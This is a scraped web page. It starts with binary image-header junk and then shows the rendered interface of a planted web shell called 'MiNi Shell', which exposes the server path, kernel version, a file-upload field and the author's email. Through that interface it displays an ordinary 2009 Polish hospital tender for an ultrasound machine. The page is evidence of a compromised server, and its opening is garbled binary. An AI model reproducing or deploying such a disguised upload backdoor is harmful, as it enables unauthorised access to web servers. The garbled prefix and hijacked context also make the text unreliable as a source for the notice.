JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/353666-N-2009.html

<p class="kh_header"><b>Kamienna Góra: dostawa wielospecjalistycznego,cyfrowego, stacjonarnego aparatu USG</b><br>
<b>Numer ogłoszenia: 353666 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa wielospecjalistycznego,cyfrowego, stacjonarnego aparatu USG.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Powiatowe  Centrum Zdrowia w Kamiennej Górze  Sp zoo NZOZ Szpital Powiatowy pragnie zaprosić Państwa firmę do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego nr 11/2009 na dostawę   aparatu do USG wg  CPV:   33.11.22.00-0; 33.11.21.00-9; 33.11.23.10-4
 	Przedmiotem zamówienia jest zakup i  jednorazowa dostawa wielospecjalistycznego cyfrowego   stacjonarnego   aparatu ultrasonograficznego  do wykonywania   pełnego spektrum  badań w zakresie:
badania jamy brzusznej,
badania naczyniowe,
badania małych i powierzchownie położonych narządów, 
badania ginekologiczno - położnicze,
badania urologiczne,
badania przez - czaszkowe,
badania mięśniowo - szkieletowe,
badania kardiologiczne. 

              Warunki minimalne dotyczące przedmiotu zamówienia:

         Ultrasonograf  winien być fabrycznie  nowy i  w pełni sprawny.  Oferowane urządzenie winno spełniać wymagania techniczne, jest kompletne, fabrycznie nowe i będzie gotowe do użytku bez żadnych dodatkowych zakupów i inwestycji (poza               materiałami eksploatacyjnymi).
            Wyspecyfikowane  urządzenie powinno być  kompletne a  po uruchomieniu gotowe do pracy bez żadnych dodatkowych zakupów i inwestycji (poza materiałami eksploatacyjnymi). Oferowane urządzenie, oprócz spełnienia odpowiednich parametrów funkcjonalnych, winno  gwarantować  bezpieczeństwo pacjentów i personelu medycznego oraz zapewniać wymagany poziom świadczonych usług  medycznych.
      Aparat winien posiadać wszelkie aktualne  (ważne) dokumenty, tj. atesty, certyfikaty, aprobaty techniczne bądź inne    świadectwa dające prawo do obrotu w placówkach medycznych - certyfikat na znak  B. Wyrób ma być oznaczony znakiem CE i ma spełniać wymagania ustawy  o wyrobach medycznych.  Oferowane urządzenie winno spełniać   parametry  techniczne określone w załączniku - wymagania techniczne - warunki graniczne  nr  l  -   zawierające  umowne  parametry zamawianych urządzenia. Szczegółowe parametry zostały określone w zał nr l.  Parametry, których minimalna wartość liczbowa określona jest w kolumnie wartość  wymagana   stanowią wymagania, których niespełnienie spowoduje odrzucenie oferty. W kolumnie wartość oferowana należy wpisać  opcję oferowanego aparatu, która będzie wartością równoważną lub lepszą od wartości wymaganej, jednakże nie wpłynie to na   oceny oferty.  Niewypełnienie pola odpowiedzi spowoduje odrzucenie oferty.  Urządzenie winno posiadać instrukcję obsługi   w języku polskim i być dostarczone przy dostawie aparatu. 
          Do oferty prosimy dołączyć dokładny opis danych technicznych oferowanego urządzenia, potwierdzający spełnienie        parametrów  wymaganych przez zamawiającego zgodnie z powyższym opisem np. prospekt, katalog itp.   Urządzenie  winno być objęte gwarancją. 
           Dostawa towaru winna nastąpić  w terminie  4 tygodni od daty zawarcia umowy. Koszt transportu winien być wliczony w cenę urządzenia.
         Wykonawca przeszkoli personel medyczny Zamawiającego  w zakresie  obsługi urządzenia. Koszt szkolenia będzie wliczony w cenę urządzenia.
          Dostawca udzieli co najmniej 24 miesięcznej gwarancji na oferowany towar oraz bezpłatny serwis w okresie gwarancyjnym.
          Dostawca zapewni bezpłatną aktualizację oprogramowania w miarę powstawania nowych wersji przez cały czas okresu użytkowania aparatu.
          Zapłata za aparat zostanie zrealizowana   ze środków własnych  przez Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.11.22.00-0, 33.11.21.00-9, 33.11.23.10-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wygada się wpłaty wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, spełniający  następujące  podstawowe  warunki:
a)nie podlegają wykluczeniu na podstawie art. 24   ust. 1 pkt. 1 - 10 oraz ust. 2 pkt. 1 - 4 oraz spełniają warunki określone w art. 22 ust.1 pkt. 1 - 4  ustawy;
b)spełnią  warunki podstawowe przedmiotu zamówienia określone w  rozdziale   I, II  i III  (oferowane towary winny posiadać parametry podane w   zał nr g)   oraz  inne wymogi określone w siwz w tym również  projektu umowy;
c)dostarczy ofertę sporządzoną wg siwz wraz z wypełnionymi następującymi formularzami określonymi w rozdziale III;
d)posiadają koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym; 
e)przedstawią dokument potwierdzający, że oferowany towar  posiada wszelkie, aktualne wymagane przepisami prawa dokumenty dopuszczające do  stosowania w placówkach służby zdrowia;
f)posiadają   doświadczenie z ostatnich 3  lat, a jeżeli okres prowadzenia działalności jest krótszy z tego okresu wyrażające się tym, że jako wykonawca   brał udział  w co najmniej 2 dostawach odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia  z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wykonanych (zakończonych)  wraz z dokumentami (np. referencjami), z których wynikać musi, że dostawy te zostały wykonane  należycie; 
g)przeszkolą personel medyczny w zakresie  obsługi aparatu   (koszt   szkolenia będzie wliczony w cenę urządzenia);
h)dostarczą   urządzenie  na własny koszt i ryzyko  do siedziby Zamawiającego  w terminie  4  tygodni  od dnia zawarcia umowy;  
i)udzielą co najmniej 24 miesięcznej  gwarancji na oferowany towar;
j)zapewni bezpłatną aktualizację oprogramowania w miarę powstawania nowych wersji przez cały czas okresu użytkowania aparatu;
k)zapewnią bezpłatny  serwis w okresie gwarancji.
 
Warunki te będą spełnione przez Wykonawcę, jeżeli potwierdzą je dokumenty, o których mowa w rozdziale III.
Ocena powyższych  warunków wymaganych od oferentów zostanie dokonana na podstawie złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, o których mowa w rozdziale III wg formuły:  spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy ubiegający się o uzyskanie zamówienia dostarczą zgodnie z   poniższym wykazem wypełnione  oświadczenia i dokumenty (które należy zaparafować i przedstawić w formie załączników do oferty, stanowiących integralną jej część):

1 załączniki: 
 

1.1 formularz ofertowy zał nr a
1.2 oświadczenie oferenta zał nr b
1.3 oświadczenie w sprawie stosowania się do siwz zał nr c
1.4 formularz upoważnienia do podpisania oferty zał nr d*
1.5 oświadczenie oferenta o spełnianiu warunków udziału w postępowaniu nr j 
1.6 oferta   zał nr e
1.7 umowa zał nr f 
1.8 formularz cenowy  zał nr g
1.9 podwykonawcy zał nr h
1.10 instrukcja obsługi w języku polskim zał k
1.11parametry techniczne - warunki graniczne - zał nr l
1.12 karta gwarancyjna zał ł
1.13 oryginalny prospekt zał m
1.14 atesty,  certyfikat na znak B   zał n
1.15 umowa przedwstępna ** - zał nr o 

2.Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane w postępowaniu o zamówienie publiczne -  w celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy - zgodnie z § 1 ust. 1 w/w RRM Zamawiający żąda następujących dokumentów (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę):
-     aktualnego odpisu z właściwego  rejestru albo aktualnego zaświadczenia o  wpisie do  ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji    działalności gospodarczej, wystawionego nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - zał nr 1;
-       aktualnych   zaświadczeń  właściwego naczelnika urzędu  skarbowego oraz właściwego oddziału  Zakładu Ubezpieczeń  Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że wykonawca   nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i  społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego  organu, wystawionych nie wcześniej niż   3 miesiące przed upływem terminu składania  ofert - zał nr 2;
-     aktualnej  informacji z Krajowego  Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawionej  nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert   -  zał  nr 3;
aktualnej  informacji z Krajowego  Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawionej nie wcześniej niż  6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert - zał  nr 4;
koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjecie działalności gospodarczej w zakresie objętym zamówieniem publicznym, zwanym dalej zamówieniem - zał nr 5 (W przypadku, gdy ustawy nie nakładają obowiązku posiadania koncesji, zezwolenia ani licencji Zamawiający uzna przedstawienie stosownego oświadczenia za wyczerpujące spełnienie zapisów tej kwestii);
w przypadku wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium RP Zamawiający wymaga złożenia dokumentów  o których mowa w  § 2 ust. 1, 2, 3 RPRM z dn. 19 maja 2006r. na zasadach określonych danymi przepisami - zał nr 6.
2.1Zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane w postępowaniu o zamówienie publiczne - w celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - zgodnie z § 1 ust. 2 w/w RRM,  Zamawiający żąda następujących dokumentów (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę):
-wykazu wykonanych dostaw  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania  o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu,  dat wykonania i odbiorców   oraz załączenia dokumentów potwierdzających, że dostawy  te zostały wykonane należycie - zał nr  A  - wykazu dostaw (Dla Zamawiającego wystarczającym jest udokumentowanie co najmniej  2 dostaw. Załączenie w ofercie więcej niż 2 udokumentowanych dostaw  nie wpłynie na ocenę oferty);  
3. Zgodnie z art. 9 ust. 4 ustawy z dnia 30 sierpnia 1991r. o zakładach opieki zdrowotnej Dz. U. z 1991r. Nr 91, poz. 408, z późniejszymi zmianami, na mocy której zakłady opieki zdrowotnej nabywają i stosują wyroby medyczne  - odpowiadające wymaganiom ustawy z dnia 20 kwietnia  2004r. o wyrobach medycznych (Dz. U. Nr 93, poz. 896)  oraz Rozporządzeniem Ministra Zdrowia z dnia 30 kwietnia 2004r. w sprawie klasyfikacji wyrobów medycznych do różnego przeznaczenia (Dz. U. z dnia 1 maja 2004r.) w celu potwierdzenia bezpieczeństwa i jakości oferowanych wyrobów Zamawiający   wymaga złożenia w ofercie dokumentów potwierdzających powyższy wymóg.   
         W tym celu Wykonawca winien pisemnie potwierdzić, czy oferowany przez niego towar  w danym przetargu jest  wyrobem medycznym, a jeśli tak, to należy  załączyć do oferty dokumenty potwierdzające dopuszczenie wyrobu medycznego do obrotu na terytorium  RP w formie oryginału lub kserokopii  potwierdzonych  za zgodność z oryginałem przez Wykonawcę tj.:
deklaracja zgodności z wymogami zasadniczymi wystawiona przez producenta (dotyczy wszystkich klas wyrobów medycznych);
certyfikat CE j. Notyfikowanej (dotyczy klas wyrobów medycznych: I sterylna, I z funkcją pomiarową, II a, II b, III);
wpis/zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania (nie dotyczy klasy wyrobu medycznego I i II a pod warunkiem, że jego pierwsze wprowadzenie do obrotu nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20.04.2004 r. o wyrobach medycznych)
      lub   złożyć   oświadczenie, iż oferowany towar  posiada dopuszczenie do obrotu zgodnie z ustawą z dnia 20.04.2004r. o wyrobach medycznych, oraz zobowiązanie Wykonawcy do przedstawienia tych dokumentów na każde wezwanie Zamawiającego   -  jako zał B.

* Załącznik wypełnić w  przypadku gdy oferta będzie podpisywana przez pełnomocnika  (nie wyszczególniony w aktualnym KRS lub wpisie do  ewidencji działalności gospodarczej), czy jednego z konsorcjantów podmiotu składającego ofertę.  W  przypadku gdy oferta będzie podpisywana przez upełnomocnionego przedstawiciela firmy wyszczególnionego w aktualnym   KRS   lub   aktualnym zaświadczeniu o wpisie do ewidencji działalności gospodarczej dany załącznik nie jest konieczny do wypełnienia i załączenia do oferty.
** dotyczy konsorcjów (W przypadku gdy  zainteresowany udziałem w przetargu występuje w imieniu konsorcjum finansowego  lub holdingu,  dołącza do oferty umowę przedwstępną)

UWAGA
Załączniki B, k, ł, m, n oraz o    sporządza wykonawca !

Wyżej wymienione dokumenty należy wypełnić w takiej formie, jak to zostało podane we wzorach. Pod rygorem odrzucenia oferty, nie dopuszcza się jakiejkolwiek zmiany ich formy. Zamawiający informuje, ze brak jakiegokolwiek ww. dokumentu będzie skutkowało wykluczeniem z postępowania z zastrzeżeniem art. 24 i art. 26 ustawy. Zamawiający przy dokonywaniu wyboru oferty będzie kierował się kryteriami  jak podano poniżej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe  Centrum Zdrowia w Kamiennej Górze  Sp zoo
NZOZ Szpital Powiatowy 
58-400 Kamienna Góra 
ul. Bohaterów Getta  10, woj. dolnośląskie 
działa zamówień publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2009 godzina 10:00, miejsce: Powiatowe  Centrum Zdrowia w Kamiennej Górze  Sp zoo
NZOZ Szpital Powiatowy 
58-400 Kamienna Góra 
ul. Bohaterów Getta  10, woj. dolnośląskie 
SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com